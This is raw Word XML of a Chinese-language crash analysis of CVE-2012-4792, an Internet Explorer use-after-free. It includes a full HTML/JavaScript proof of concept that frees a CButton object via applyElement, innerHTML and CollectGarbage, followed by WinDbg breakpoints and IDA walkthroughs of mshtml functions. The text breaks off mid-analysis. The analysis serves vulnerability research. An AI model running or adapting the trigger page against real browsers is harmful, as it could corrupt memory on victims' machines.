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F0" w:rsidRDefault="005A0DF0" w:rsidP="00570A00">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK12"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK13"/>
      <w:bookmarkStart w:id="2" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK2"/>
      <w:bookmarkStart w:id="4" w:name="OLE_LINK7"/>
      <w:r w:rsidRPr="000812A5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2012-4792</w:t>
      </w:r>
      <w:r w:rsidRPr="00250FC0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞利用分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A0DF0" w:rsidRPr="00184582" w:rsidRDefault="005A0DF0" w:rsidP="00D14CE3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="OLE_LINK3"/>
      <w:bookmarkStart w:id="6" w:name="OLE_LINK4"/>
      <w:bookmarkStart w:id="7" w:name="OLE_LINK8"/>
      <w:bookmarkStart w:id="8" w:name="OLE_LINK9"/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5A0DF0" w:rsidTr="0075202C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005A0DF0" w:rsidRPr="000A2443" w:rsidRDefault="005A0DF0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5A0DF0" w:rsidRPr="000A2443" w:rsidRDefault="005A0DF0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5A0DF0" w:rsidTr="0075202C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005A0DF0" w:rsidRPr="000A2443" w:rsidRDefault="005A0DF0" w:rsidP="00221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E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4110" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005A0DF0" w:rsidRPr="000A2443" w:rsidRDefault="005A0DF0" w:rsidP="002212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0.7601.17514</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005A0DF0" w:rsidRDefault="005A0DF0" w:rsidP="00421E8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="OLE_LINK5"/>
      <w:bookmarkStart w:id="10" w:name="OLE_LINK6"/>
    </w:p>
    <w:p w:rsidR="005A0DF0" w:rsidRPr="00184582" w:rsidRDefault="005A0DF0" w:rsidP="00ED57C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="OLE_LINK29"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/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原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A0DF0" w:rsidRPr="00B373FF" w:rsidRDefault="005A0DF0" w:rsidP="00B373FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B373FF">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B373FF">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>po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DF0" w:rsidTr="00284C6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr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>&lt;!doctype html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>&lt;html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>&lt;head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&lt;script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function exploit() {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var e0 = null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var e1 = null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var e2 = null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try {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    e0 = document.getElementById("a")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    e1 = document.createElement("div")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    e2 = document.createElement("q")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    e1.applyElement(e2)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    e1.appendChild(document.createElement('button'))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    e1.applyElement(e0)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    e2.innerHTML = ""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    e2.appendChild(document.createElement('body'))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} catch (e) {}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    CollectGarbage()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    }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&lt;/script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>&lt;/head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>&lt;body onload="exploit()"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&lt;form id="a"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 xml:space="preserve">    &lt;/form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>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005A0DF0" w:rsidRPr="003F3C1C" w:rsidRDefault="005A0DF0" w:rsidP="003F3C1C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005A0DF0" w:rsidRDefault="005A0DF0" w:rsidP="003F3C1C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F3C1C">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005A0DF0" w:rsidRDefault="005A0DF0" w:rsidP="00284C6E">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CE0EEB" w:rsidRDefault="005A0DF0" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="OLE_LINK30"/>
      <w:bookmarkStart w:id="13" w:name="OLE_LINK31"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="003F3C1C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e2.innerHTML = ""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r w:rsidR="00CE0EEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，DOM树结构：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:bookmarkEnd w:id="8"/>
    <w:p w:rsidR="00CE363C" w:rsidRPr="00C81FA2" w:rsidRDefault="00D74077" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE363C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59EA80" wp14:editId="5F86149A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>576140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1245235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1284648" cy="262255"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445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48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3D7" w:rsidRDefault="00D74077" w:rsidP="005403D7">
                            <w:r>
                              <w:t xml:space="preserve">e0: </w:t>
                            </w:r>
                            <w:r w:rsidR="005403D7">
                              <w:t>CForm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9EA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.35pt;margin-top:98.05pt;width:101.1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" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="005403D7" w:rsidRDefault="00D74077" w:rsidP="005403D7">
                      <w:r>
                        <w:t xml:space="preserve">e0: </w:t>
                      </w:r>
                      <w:r w:rsidR="005403D7">
                        <w:t>CFormEl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6F07" w:rsidRPr="00CE363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59EA80" wp14:editId="5F86149A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>647934</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1570748</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1127573" cy="262255"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445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573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D15" w:rsidRDefault="00BA6F07" w:rsidP="006A4D15">
                            <w:r>
                              <w:t xml:space="preserve">e1: </w:t>
                            </w:r>
                            <w:r w:rsidR="006A4D15">
                              <w:t>CDiv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EA80" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:51pt;margin-top:123.7pt;width:88.8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" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="006A4D15" w:rsidRDefault="00BA6F07" w:rsidP="006A4D15">
                      <w:r>
                        <w:t xml:space="preserve">e1: </w:t>
                      </w:r>
                      <w:r w:rsidR="006A4D15">
                        <w:t>CDivEl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395E" w:rsidRPr="00CE363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59EA80" wp14:editId="5F86149A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>518678</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>931124</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1342472" cy="262255"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445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72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3C" w:rsidRDefault="00E6395E" w:rsidP="00CE363C">
                            <w:r>
                              <w:t xml:space="preserve">e2: </w:t>
                            </w:r>
                            <w:r w:rsidR="00CE363C">
                              <w:t>CPhraseEleme</w:t>
                            </w:r>
                            <w:r w:rsidR="00CB4ECC"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EA80" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:40.85pt;margin-top:73.3pt;width:105.7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" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00CE363C" w:rsidRDefault="00E6395E" w:rsidP="00CE363C">
                      <w:r>
                        <w:t xml:space="preserve">e2: </w:t>
                      </w:r>
                      <w:r w:rsidR="00CE363C">
                        <w:t>CPhraseEleme</w:t>
                      </w:r>
                      <w:r w:rsidR="00CB4ECC">
                        <w:t>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053C" w:rsidRPr="00CE363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59EA80" wp14:editId="5F86149A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>838531</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>2003425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="683812" cy="262255"/>
                <wp:effectExtent l="0" t="0" r="2540" b="4445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2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3C" w:rsidRDefault="0059053C" w:rsidP="0059053C">
                            <w:r>
                              <w:t>C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EA80" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:66.05pt;margin-top:157.75pt;width:53.8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" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="0059053C" w:rsidRDefault="0059053C" w:rsidP="0059053C">
                      <w:r>
                        <w:t>CButt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363C" w:rsidRPr="00CE363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7F8E84" wp14:editId="208B037F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>600323</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>548640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1009650" cy="262255"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445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63C" w:rsidRDefault="00CE363C" w:rsidP="00CE363C">
                            <w:r>
                              <w:t>CR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ot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8E84" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:47.25pt;margin-top:43.2pt;width:79.5pt;height:2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" fillcolor="white [3212]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00CE363C" w:rsidRDefault="00CE363C" w:rsidP="00CE363C">
                      <w:r>
                        <w:t>CR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otElem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578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492</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>767301</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1550035" cy="1359093"/>
                <wp:effectExtent l="0" t="0" r="12065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3590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C8DE" id="矩形 43" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:32.25pt;margin-top:60.4pt;width:122.05pt;height:1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" fillcolor="white [3212]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0094578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616</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1077401</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1263650" cy="977403"/>
                <wp:effectExtent l="0" t="0" r="12700" b="1333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9774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2BB5" id="矩形 44" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:43.5pt;margin-top:84.85pt;width:99.5pt;height:7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" fillcolor="white [3212]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0094578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402963</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1033669" cy="548640"/>
                <wp:effectExtent l="0" t="0" r="14605" b="228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0459" id="矩形 45" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:51.65pt;margin-top:110.45pt;width:81.4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" fillcolor="white [3212]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A710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626</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>409078</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1916265" cy="1812898"/>
                <wp:effectExtent l="0" t="0" r="27305" b="1651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5" cy="1812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7109C" id="矩形 35" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:15.9pt;margin-top:32.2pt;width:150.9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" fillcolor="white [3212]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="OLE_LINK10"/>
      <w:r w:rsidR="00D24509">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2313829" cy="2282024"/>
                <wp:effectExtent l="0" t="0" r="10795" b="23495"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29" cy="2282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E2D" w:rsidRDefault="004D7E2D" w:rsidP="004D7E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4" o:spid="_x0000_s1031" style="width:182.2pt;height:17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" fillcolor="white [3212]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="004D7E2D" w:rsidRDefault="004D7E2D" w:rsidP="004D7E2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E363C" w:rsidRPr="00CE363C">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p w:rsidR="00CE363C" w:rsidRDefault="00CE363C" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A0DF0" w:rsidRPr="00B373FF" w:rsidRDefault="005A0DF0" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="OLE_LINK11"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B373FF">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F69D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>触发条件</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:p w:rsidR="00CE6393" w:rsidRDefault="000804E3" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开启hpa和ust，打开页面，i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rash：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="15"/>
    <w:p w:rsidR="000804E3" w:rsidRPr="00037AB8" w:rsidRDefault="00394046" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0113C786" wp14:editId="7F28B677">
            <wp:extent cx="6645910" cy="3517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8" w:rsidRDefault="00E46E48" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="OLE_LINK14"/>
      <w:bookmarkStart w:id="17" w:name="OLE_LINK15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此时edi保存的CButton对象已经被释放。</w:t>
      </w:r>
      <w:r w:rsidR="00BE50C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>观察调用栈：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00BE50C7" w:rsidRPr="00037AB8" w:rsidRDefault="00BE50C7" w:rsidP="00CE639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4151AC6" wp14:editId="77F61128">
            <wp:extent cx="6645910" cy="36125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8" w:rsidRDefault="00D15CA7" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="OLE_LINK16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞现场是在</w:t>
      </w:r>
      <w:r w:rsidR="001D676C" w:rsidRPr="001D676C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMarkup::OnLoadStatusDone+0x4d0</w:t>
      </w:r>
      <w:r w:rsidR="001D676C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但是ub</w:t>
      </w:r>
      <w:r w:rsidR="001D676C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D676C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eip却在</w:t>
      </w:r>
      <w:r w:rsidR="001D676C" w:rsidRPr="001D676C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CDoc::PrivateQueryInterface</w:t>
      </w:r>
      <w:r w:rsidR="001D676C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r w:rsidR="001D676C" w:rsidRPr="001D676C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMarkup::OnLoadStatusDone+0x4d0</w:t>
      </w:r>
      <w:r w:rsidR="001D676C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前是一处跳转，用IDA查看</w:t>
      </w:r>
      <w:r w:rsidR="001D676C" w:rsidRPr="001D676C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMarkup::OnLoadStatusDone</w:t>
      </w:r>
      <w:r w:rsidR="001D676C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:p w:rsidR="001D676C" w:rsidRDefault="00175F9C" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2811434A" wp14:editId="6B31AF01">
            <wp:extent cx="6645910" cy="287782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59" w:rsidRDefault="00577059" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="OLE_LINK17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在漏洞现场不远有一处函数调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00577059">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::FindDefaultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，保存了已经释放的CB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>utton</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的edi就来自该函数的返回值eax，跟进观察</w:t>
      </w:r>
      <w:r w:rsidRPr="00577059">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::FindDefaultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:p w:rsidR="00577059" w:rsidRDefault="00965ECE" w:rsidP="00CE639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23F3EA6" wp14:editId="70D53CB5">
            <wp:extent cx="6645910" cy="439864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E0" w:rsidRDefault="00D64076" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="OLE_LINK18"/>
      <w:bookmarkStart w:id="21" w:name="OLE_LINK19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64076">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::Doc(void)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前的C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oc</w:t>
      </w:r>
      <w:r w:rsidR="005752D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象保存在edi中，然后通过</w:t>
      </w:r>
      <w:r w:rsidR="0035034F" w:rsidRPr="0035034F">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::GetParentForm</w:t>
      </w:r>
      <w:r w:rsidR="0035034F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="0035034F" w:rsidRPr="0035034F">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ParentForm</w:t>
      </w:r>
      <w:r w:rsidR="0035034F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再进行比较，最后将edi+1A8h的值保存到eax返回。</w:t>
      </w:r>
      <w:r w:rsidR="00596AE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态调试</w:t>
      </w:r>
      <w:r w:rsidR="006E03E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidR="006E03E2" w:rsidRPr="006E03E2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.text:74DC9FE8                 call    ?FindDefaultElem@CElement@@QAEPAV1@HH@Z ; CElement::FindDefaultElem(int,int)</w:t>
      </w:r>
      <w:r w:rsidR="006E03E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处下断点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E764D9" w:rsidRPr="00E764D9" w:rsidRDefault="00E764D9" w:rsidP="00E764D9">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E764D9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bp mshtml!CMarkup::OnLoadStatusDone+3A7</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkEnd w:id="21"/>
    <w:p w:rsidR="006E03E2" w:rsidRDefault="00837CA3" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B26F7E" wp14:editId="560D27D6">
            <wp:extent cx="6645910" cy="34302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68" w:rsidRDefault="00EC3768" w:rsidP="00CE6393">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="OLE_LINK20"/>
      <w:bookmarkStart w:id="23" w:name="OLE_LINK21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跟进</w:t>
      </w:r>
      <w:r w:rsidRPr="006E03E2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::FindDefaultElem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371915" w:rsidRPr="008A04D0" w:rsidRDefault="00371915" w:rsidP="008A04D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A04D0">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CElement::Doc(void)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A04D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前的C</w:t>
      </w:r>
      <w:r w:rsidRPr="008A04D0">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="008A04D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00F463C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="008A04D0">
        <w:rPr>
